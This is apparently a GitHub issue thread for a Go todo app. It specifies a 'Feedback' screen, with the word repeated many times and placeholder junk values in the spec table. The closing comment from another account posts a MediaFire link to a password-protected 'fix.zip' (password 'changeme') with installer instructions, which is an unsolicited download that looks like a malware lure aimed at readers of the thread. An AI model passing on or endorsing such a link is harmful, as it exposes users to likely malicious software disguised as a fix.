### ISSUE TITLE
FeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedback

### ISSUE THREAD

**Issue by sondv-3238** [giangnt-3150/todo-app-golang#113]
## Summary
- Build UI for FeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedback screen like the design in image 1 below
- Create function for FeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedback screen with detailed spec of each item written in the section [Detail spec](#Detail_spec)
## Design
- **Image 1**: Design of FeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedback screen
  - [Figma link](https://www.figma.com/file/7Uv5S8jXtcuNDIcXbB32DF/Test%20prj?98:125)
![](http://localhost:3000/api/images/7Uv5S8jXtcuNDIcXbB32DF/98:125/1c866c5d0c8599b5d847b13d.png)

- **Image 2**: Design of FeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedbackFeedback screen with item numbering
![](http://localhost:3000/api/images/7Uv5S8jXtcuNDIcXbB32DF/98:125/59b81badb6a740e20dc6e427.png)

<h2 id="Detail_spec">Detail spec</h2>

### Item list of screen

|No|ItemName|NameJP|Name EN/VN|Item Type|Data Type|Required|Format|Max-Length/Size|Min-Length/Size|Default Value|Validation-Note|DB-Table Name|DB-Column Name|DB-Note|Description|
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |--- | --- | --- | --- | --- |
|1|Top Bar \[container:top\-bar\] |sedfsdf||||true|NULL|NULL|NULL|NULL|NULL|||NULL|NULL|
|1.1|Arrow back|sadasd||||NULL|NULL|NULL|NULL|NULL|NULL|||NULL|NULL|

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
